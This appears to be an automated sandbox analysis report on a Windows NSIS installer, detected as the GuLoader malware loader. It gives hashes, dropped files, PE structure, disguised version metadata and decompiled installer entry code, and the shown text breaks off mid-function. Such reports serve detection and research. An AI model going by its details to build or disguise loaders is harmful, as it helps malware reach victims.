Preview:	....f.f.....GE.......z.I.J=.yk.....W[...o....6......O-P.j"q..h.r...m.v..X...F.1.BV..p.,....Td...L\|c.A.._C......~.7ws...4.Z...$...>..e.YS...&..l..._............}.a;'a..gY.DN.Ql.`.(+#;......%3...]..u..\K.8..<f./.)..w.0.l..:n.x..Nt{.....?^..M580H. C...d2@..!..U..R%i.GE.......z.I.J=.yk.....W[...o....6...............O-P.j"q..h.r...m.v..X...F.1.BV..p.,....Td...L\|c.A.._C......~.7ws...4.Z...$...>..e.YS...&.....}.a;'a..gY.DN.Ql.`.(+#;......1.......k..\|3...]..u..\K.8..<f./.)..w.0.l..:n.x..Nt{.....?^..M580H. C...d2@..!..U..R%i.GE.......z.I.J=.yk.....W[...o....6......O-P.......n....."q..h.r...m.v..X...F.1.BV..p.,....Td...L\|c.A.._C......~.7ws...4.Z...$...>..e.YS...&.....}.a;'a..gY.DN.Ql.`.(+#;......%3...4...:.............]..u..\K.8..<f./.)..w.0.l..:n.x..Nt{.....?^..M580H. C...d2@..!..U..R%i.GE.......z.I.J=.yk.....W[...o....6......O-P.j"q..h.r...m.v..X...F.1.BV.......f.........p.,....Td...L\|c.A.._C......~.7ws...4.Z...$...>..e.YS.

C:\Users\user\AppData\Local\Temp\emblem-default-symbolic.symbolic.png

Download File

Process:	C:\Users\user\Desktop\aSsc9zh1ex.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	288
Entropy (8bit):	7.002703251110111
Encrypted:	false
SSDEEP:	6:6v/lhPysDjYOGW78zHS1w9xuIGXdvkFRBp9rXHEb/GY1IX2NYKjp:6v/7jjYOGW7Rw9xu6pxHG/VIX6F
MD5:	A83F8C904AFA9E3F6A50D263747CF6DF
SHA1:	7B9D99B950518FCAF5AC59350823D2B20E82956F
SHA-256:	F57C0B31EC836E26EB609F259CFA68DDA95F09685784423B61075DAE4BBA5BF6
SHA-512:	4B2DC243E86514BDC816B92808C491EF71B72690F25C2372FE909CED3A103F990708C507065169FA5C6F823A8B1ADADB7BF13696E78C807A973789CF14CA3A06
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR................a....sBIT....\|.d.....IDAT8...N.Q...'.....X.s.^../H.f.....BJ....V[.b..qsvA..d..y.9?...z.`./....'..[.Q..'...M.....mwuN.\....h..(\|........p.K..I.%..... ..*..x.t~.kW.`V'.8.W.K.l.4..9.&\..k..3F........4.0.op.rL#.....N:.=.T.[....L.....p...#....IEND.B`.

C:\Users\user\AppData\Local\Temp\face-crying.png

Download File

Process:	C:\Users\user\Desktop\aSsc9zh1ex.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	893
Entropy (8bit):	7.712327619290152
Encrypted:	false
SSDEEP:	12:6v/7M/6CsI5hmePcdiB6BV3h8SkKc47zOTtcC8VErf6qdY94OR/vlNMgmaGe7fb:q65hBcs6L3h6hBcCLrDq42nMDanb
MD5:	473EE416AF2C1AE05AA7D5D004C9B3D2
SHA1:	EEC352E25F562C0386D5C92384A70B3005D40D6F
SHA-256:	2C48F1719BBC825592FB0929E31DCFE66578665D28099087EA98EF261688DC18
SHA-512:	2B05C9920CFDCF378448F35B14AA56078051584CA0DB15F43B5A27272B072DD8A76BBC2829DF4C7C7BAF8339839974A00CA7BFFB8425B7D9494421CCC9EE80C1
Malicious:	false
Preview:	.PNG........IHDR................a...DIDATx.e.C..H.F_..tzl{m.m.m.m..;=F+..j.......r.........hZ...%Sn...Z....\|g...o.c..f..k..#.Y.5..2...r44.t...[\|.EW....E..3v....o...n...y.V.%.\g.].XY.).PQ..h~.Mu.:I.~.!{dt...-....c........~.ihs..<.23h.q...AA....P.O.d.#....S%....w....~(.Yg.mL.`..r.U?A.D......%.t..~.b..wl...G\r.......,^m.b%..??...?./........O..w\\|..t..5...^x....cK..?..b...3^#i.xYp3.>..C<Q.yg^.3.=..;./..!.`.....dq%...`..wB....q.2....W....S`....E....q3.A....9...."..].+.f...-.Z)d*..h..O>......c>...=.P..!...pw}g..t&.=..Dd...i.f......\....-JO0hW....!.ic.%...s.+...iG\|..MK...O_..;_.q_....\|...F....M...O...o..5.=...y{...]hn..Z..L+..`r.&I...5t._Dz..m.~$n$..\|.u}_.n\|.53..b.+Zn.bCA.1..x..hv?.{8...!\J......>OukN..{...[#.....7....k..L.#...D.y:K5.\|.&..XV.U..rb..T..G..6.I...~.....i.#ike...9/B_&.....^v]..._.l.Et.i..M..l.B1...A.....>._...P.,... ....IEND.B`.

C:\Users\user\AppData\Local\Temp\nsc4B5D.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\aSsc9zh1ex.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.814115788739565
Encrypted:	false
SSDEEP:	192:Zjvco0qWTlt70m5Aj/lQ0sEWD/wtYbBHFNaDybC7y+XBz0QPi:FHQlt70mij/lQRv/9VMjzr
MD5:	CFF85C549D536F651D4FB8387F1976F2
SHA1:	D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E
SHA-256:	8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
SHA-512:	531D6328DAF3B86D85556016D299798FA06FEFC81604185108A342D000E203094C8C12226A12BD6E1F89B0DB501FB66F827B610D460B933BD4AB936AC2FD8A88
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....Oa...........!....."..................@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\wxbase30u_xml_gcc_custom.dll

Download File

Process:	C:\Users\user\Desktop\aSsc9zh1ex.exe
File Type:	PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	214568
Entropy (8bit):	6.30310219025288
Encrypted:	false
SSDEEP:	3072:WSQvJRT4XDaGZcJRQqnKJNuC3d5C/I4ye9P7Vvw/YDQzix+AKp:WDRT4XDpZ0QqnKJNuCwx9PRCixK
MD5:	6D01A897D44DD4D25D7E1264407210FD
SHA1:	332C3ADE84D0C1E5BE298C037F9FE222620343B2
SHA-256:	DD8289A21902F458B861C08A2F54D23F1E214B37BB89E73D4108303B490F7644
SHA-512:	54098533FDC9B4BAB0CD525D652846B5CDCD808089346D0192D7CF9DE6C1E8E329E2071886391D729F3DFED59D2E860E8A811E07E6688E6AA0B55D5D98D1AD8D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.................."...#.B..........P..........d....................................2.....`... ......................................P.......`......................."..($..................................@...(....................c..8............................text....A.......B..................`.P`.data........`.......F..............@.`..rdata..\....p.......H..............@.`@.pdata..............................@.0@.xdata....... ......................@.0@.bss.........@........................`..edata.......P......................@.0@.idata.......`......................@.0..CRT....X...........................@.@..tls................................@.@..rsrc...............................@.0..reloc..............................@.0B................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.537994904334399
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	aSsc9zh1ex.exe
File size:	326847
MD5:	d5e55a57372bcad45fbb260105179caf
SHA1:	9b1935a927c072dd31017362ff1739bf1ea2aaf7
SHA256:	3c27c2aa1bc826faa65ab4038eb385cabd6db50108410e6f674d455aa1dc5532
SHA512:	088033564668a4fd3e107566387fecf0b6dcbd7a161c9ef3e4adb232520467a64af9eec740fe783d5c62fa3b79bdd910e72f3acc838e5fa155427c83003c407b
SSDEEP:	6144:13yztyL/0/bbdat6J9mOnuuAgo+/sOxCHBs4YIwUrJrnBpKussJ9LQu:13pL0/bbdat6JIO1Ag2TBs4YI3BnB35N
TLSH:	07640144E6684D21FCBA0D3C0533D4A76974CC220879DBBB2BAE751A2BF51D1822FD67
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L...h.Oa.................h....:....

File Icon


Icon Hash:	c8fbb7a7a7e3f80c

Static PE Info

General

Entrypoint:	0x40350a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x614F9A68 [Sat Sep 25 21:53:44 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	56a78d55f3f7af51443e58e0ce2fb5f6

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 000003F4h
push ebx
push esi
push edi
push 00000020h
pop edi
xor ebx, ebx
push 00008001h
mov dword ptr [ebp-14h], ebx
mov dword ptr [ebp-04h], 0040A2E0h
mov dword ptr [ebp-10h], ebx
call dword ptr [004080CCh]
mov esi, dword ptr [004080D0h]
lea eax, dword ptr [ebp-00000140h]
push eax
mov dword ptr [ebp-0000012Ch], ebx
mov dword ptr [ebp-2Ch], ebx
mov dword ptr [ebp-28h], ebx
mov dword ptr [ebp-00000140h], 0000011Ch
call esi
test eax, eax
jne 00007FED0073078Ah
lea eax, dword ptr [ebp-00000140h]
mov dword ptr [ebp-00000140h], 00000114h
push eax
call esi
mov ax, word ptr [ebp-0000012Ch]
mov ecx, dword ptr [ebp-00000112h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [ebp-26h], 00000004h
not eax
and eax, ecx
mov word ptr [ebp-2Ch], ax
cmp dword ptr [ebp-0000013Ch], 0Ah
jnc 00007FED0073075Ah
and word ptr [ebp-00000132h], 0000h
mov eax, dword ptr [ebp-00000134h]
movzx ecx, byte ptr [ebp-00000138h]
mov dword ptr [007A8B18h], eax
xor eax, eax
mov ah, byte ptr [ebp-0000013Ch]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [ebp-2Ch]
movzx ecx, cx
shl eax, 10h
or eax, ecx

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8504	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3d6000	0x15908	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6670	0x6800	False	0.667931189904	data	6.43600264122	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x139a	0x1400	False	0.45	data	5.14577456407	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x39eb78	0x600	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata	0x3a9000	0x2d000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x3d6000	0x15908	0x15a00	False	0.471132135116	data	5.8124427271	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x3d62c8	0x10828	dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0	English	United States
RT_ICON	0x3e6af0	0x25a8	data	English	United States
RT_ICON	0x3e9098	0x10a8	data	English	United States
RT_ICON	0x3ea140	0x988	data	English	United States
RT_ICON	0x3eaac8	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_DIALOG	0x3eaf30	0x100	data	English	United States
RT_DIALOG	0x3eb030	0x11c	data	English	United States
RT_DIALOG	0x3eb150	0xc4	data	English	United States
RT_DIALOG	0x3eb218	0x60	data	English	United States
RT_GROUP_ICON	0x3eb278	0x4c	data	English	United States
RT_VERSION	0x3eb2c8	0x300	data	English	United States
RT_MANIFEST	0x3eb5c8	0x33e	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
ADVAPI32.dll	RegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
SHELL32.dll	SHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
ole32.dll	OleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll	GetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
GDI32.dll	SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll	GetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

Version Infos

Description	Data
LegalCopyright	Avnet, Inc.
FileVersion	24.30.26
CompanyName	Stewart Information Services Corp
LegalTrademarks	PacifiCare Health Systems Inc
Comments	Reliance Steel & Aluminum Co.
ProductName	Mariner Health Care Inc.
FileDescription	Disc Soft Ltd
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

⊘No network behavior found

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

System Behavior

Analysis Process: aSsc9zh1ex.exePID: 4152, Parent PID: 1964

General

Target ID:	1
Start time:	10:31:53
Start date:	12/05/2022
Path:	C:\Users\user\Desktop\aSsc9zh1ex.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\aSsc9zh1ex.exe"
Imagebase:	0x400000
File size:	326847 bytes
MD5 hash:	D5E55A57372BCAD45FBB260105179CAF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.886415142.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: aSsc9zh1ex.exePID: 4152, Parent PID: 1964COMMON

Execution Graph

Execution Coverage:	16.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16%
Total number of Nodes:	1577
Total number of Limit Nodes:	30

Executed Functions

Function 0040350A Relevance: 84.4, APIs: 33, Strings: 15, Instructions: 450
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				WCHAR* _t92;
				char* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t120;
				intOrPtr* _t124;
				void* _t138;
				void* _t144;
				void* _t149;
				void* _t153;
				void* _t158;
				signed int _t168;
				void* _t171;
				void* _t176;
				intOrPtr _t178;
				intOrPtr _t179;
				intOrPtr* _t180;
				int _t189;
				void* _t190;
				void* _t199;
				signed int _t205;
				signed int _t210;
				signed int _t215;
				signed int _t217;
				int* _t219;
				signed int _t227;
				signed int _t230;
				CHAR* _t232;
				char* _t233;
				signed int _t234;
				WCHAR* _t235;
				void* _t251;

				_t217 = 0x20;
				_t189 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x7a8b18 = _v324.dwBuildNumber;
				 *0x7a8b1c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x7a8b1e != 0x600) {
					_t180 = E004068E7(_t189);
					if(_t180 != _t189) {
						 *_t180(0xc00);
					}
				}
				_t232 = "UXTHEME";
				do {
					E00406877(_t232); // executed
					_t232 =  &(_t232[lstrlenA(_t232) + 1]);
				} while ( *_t232 != 0);
				E004068E7(0xb);
				 *0x7a8a64 = E004068E7(9);
				_t88 = E004068E7(7);
				if(_t88 != _t189) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x7a8b1c =  *0x7a8b1c | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t189); // executed
				 *0x7a8b20 = _t88;
				SHGetFileInfoW(0x79ff08, _t189,  &_v1016, 0x2b4, _t189); // executed
				E0040651A(0x7a7a60, L"NSIS Error");
				_t92 = GetCommandLineW();
				_t233 = L"\"C:\\Users\\engineer\\Desktop\\aSsc9zh1ex.exe\" ";
				E0040651A(_t233, _t92);
				_t94 = _t233;
				_t234 = 0x22;
				 *0x7a8a60 = 0x400000;
				_t251 = L"\"C:\\Users\\engineer\\Desktop\\aSsc9zh1ex.exe\" " - _t234; // 0x22
				if(_t251 == 0) {
					_t217 = _t234;
					_t94 =  &M007B3002;
				}
				_t199 = CharNextW(E00405E16(_t94, _t217));
				_v16 = _t199;
				while(1) {
					_t97 =  *_t199;
					_t252 = _t97 - _t189;
					if(_t97 == _t189) {
						break;
					}
					_t210 = 0x20;
					__eflags = _t97 - _t210;
					if(_t97 != _t210) {
						L17:
						__eflags =  *_t199 - _t234;
						_v12 = _t210;
						if( *_t199 == _t234) {
							_v12 = _t234;
							_t199 = _t199 + 2;
							__eflags = _t199;
						}
						__eflags =  *_t199 - 0x2f;
						if( *_t199 != 0x2f) {
							L32:
							_t199 = E00405E16(_t199, _v12);
							__eflags =  *_t199 - _t234;
							if(__eflags == 0) {
								_t199 = _t199 + 2;
								__eflags = _t199;
							}
							continue;
						} else {
							_t199 = _t199 + 2;
							__eflags =  *_t199 - 0x53;
							if( *_t199 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t215 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t227 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t215;
								__eflags =  *_t199 - (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215);
								if( *_t199 != (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t215)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t210 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t230 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t210;
									__eflags =  *(_t199 - 4) - (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210);
									if( *(_t199 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t210)) {
										L31:
										_t234 = 0x22;
										goto L32;
									}
									__eflags =  *_t199 - _t230;
									if( *_t199 == _t230) {
										 *(_t199 - 4) = _t189;
										__eflags = _t199;
										E0040651A(L"C:\\Users\\engineer\\AppData\\Local\\Temp", _t199);
										L37:
										_t235 = L"C:\\Users\\engineer\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t235);
										_t116 = E004034D9(_t199, _t252);
										_t253 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E0040307D(_t255, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t189) {
												L68:
												E00403AEF();
												__imp__OleUninitialize();
												if(_v8 == _t189) {
													if( *0x7a8af4 == _t189) {
														L77:
														_t120 =  *0x7a8b0c;
														if(_t120 != 0xffffffff) {
															_v24 = _t120;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t189, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t189,  &_v40, _t189, _t189, _t189);
													}
													_t124 = E004068E7(4);
													if(_t124 == _t189) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t189);
														_push(_t189);
														_push(_t189);
														if( *_t124() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405B7A(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x7a8a7c == _t189) {
												L51:
												 *0x7a8b0c =  *0x7a8b0c | 0xffffffff;
												_v24 = E00403BC9(_t265);
												goto L68;
											}
											_t219 = E00405E16(L"\"C:\\Users\\engineer\\Desktop\\aSsc9zh1ex.exe\" ", _t189);
											if(_t219 < L"\"C:\\Users\\engineer\\Desktop\\aSsc9zh1ex.exe\" ") {
												L48:
												_t264 = _t219 - L"\"C:\\Users\\engineer\\Desktop\\aSsc9zh1ex.exe\" ";
												_v8 = L"Error launching installer";
												if(_t219 < L"\"C:\\Users\\engineer\\Desktop\\aSsc9zh1ex.exe\" ") {
													_t190 = E00405AE5(__eflags);
													lstrcatW(_t235, L"~nsu");
													__eflags = _t190;
													if(_t190 != 0) {
														lstrcatW(_t235, "A");
													}
													lstrcatW(_t235, L".tmp");
													_t138 = lstrcmpiW(_t235, 0x7b4800);
													__eflags = _t138;
													if(_t138 == 0) {
														L67:
														_t189 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t190;
														_push(_t235);
														if(_t190 == 0) {
															E00405AC8();
														} else {
															E00405A4B();
														}
														SetCurrentDirectoryW(_t235);
														__eflags = L"C:\\Users\\engineer\\AppData\\Local\\Temp"; // 0x43
														if(__eflags == 0) {
															E0040651A(L"C:\\Users\\engineer\\AppData\\Local\\Temp", 0x7b4800);
														}
														E0040651A(0x7a9000, _v16);
														_t202 = "A" & 0x0000ffff;
														_t144 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t144;
														_v12 = 0x1a;
														 *0x7a9800 = _t144;
														do {
															E00406557(0, 0x79f708, _t235, 0x79f708,  *((intOrPtr*)( *0x7a8a70 + 0x120)));
															DeleteFileW(0x79f708);
															__eflags = _v8;
															if(_v8 != 0) {
																_t149 = CopyFileW(L"C:\\Users\\engineer\\Desktop\\aSsc9zh1ex.exe", 0x79f708, 1);
																__eflags = _t149;
																if(_t149 != 0) {
																	E004062DA(_t202, 0x79f708, 0);
																	E00406557(0, 0x79f708, _t235, 0x79f708,  *((intOrPtr*)( *0x7a8a70 + 0x124)));
																	_t153 = E00405AFD(0x79f708);
																	__eflags = _t153;
																	if(_t153 != 0) {
																		CloseHandle(_t153);
																		_v8 = 0;
																	}
																}
															}
															 *0x7a9800 =  *0x7a9800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E004062DA(_t202, _t235, 0);
														goto L67;
													}
												}
												 *_t219 = _t189;
												_t222 =  &(_t219[2]);
												_t158 = E00405EF1(_t264,  &(_t219[2]));
												_t265 = _t158;
												if(_t158 == 0) {
													goto L68;
												}
												E0040651A(L"C:\\Users\\engineer\\AppData\\Local\\Temp", _t222);
												E0040651A(0x7b4000, _t222);
												_v8 = _t189;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t205 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t168 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t210 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
											while( *_t219 != _t205 || _t219[1] != _t168) {
												_t219 = _t219;
												if(_t219 >= L"\"C:\\Users\\engineer\\Desktop\\aSsc9zh1ex.exe\" ") {
													continue;
												}
												break;
											}
											_t189 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t235, 0x3fb);
										lstrcatW(_t235, L"\\Temp");
										_t171 = E004034D9(_t199, _t253);
										_t254 = _t171;
										if(_t171 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t235);
										lstrcatW(_t235, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t235);
										SetEnvironmentVariableW(L"TMP", _t235);
										_t176 = E004034D9(_t199, _t254);
										_t255 = _t176;
										if(_t176 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t199 + 4)) - _t227;
								if( *((intOrPtr*)(_t199 + 4)) != _t227) {
									goto L29;
								}
								_t178 =  *((intOrPtr*)(_t199 + 8));
								__eflags = _t178 - 0x20;
								if(_t178 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t178 - _t189;
								if(_t178 != _t189) {
									goto L29;
								}
								goto L28;
							}
							_t179 =  *((intOrPtr*)(_t199 + 2));
							__eflags = _t179 - _t210;
							if(_t179 == _t210) {
								L23:
								 *0x7a8b00 = 1;
								goto L24;
							}
							__eflags = _t179 - _t189;
							if(_t179 != _t189) {
								goto L24;
							}
							goto L23;
						}
					} else {
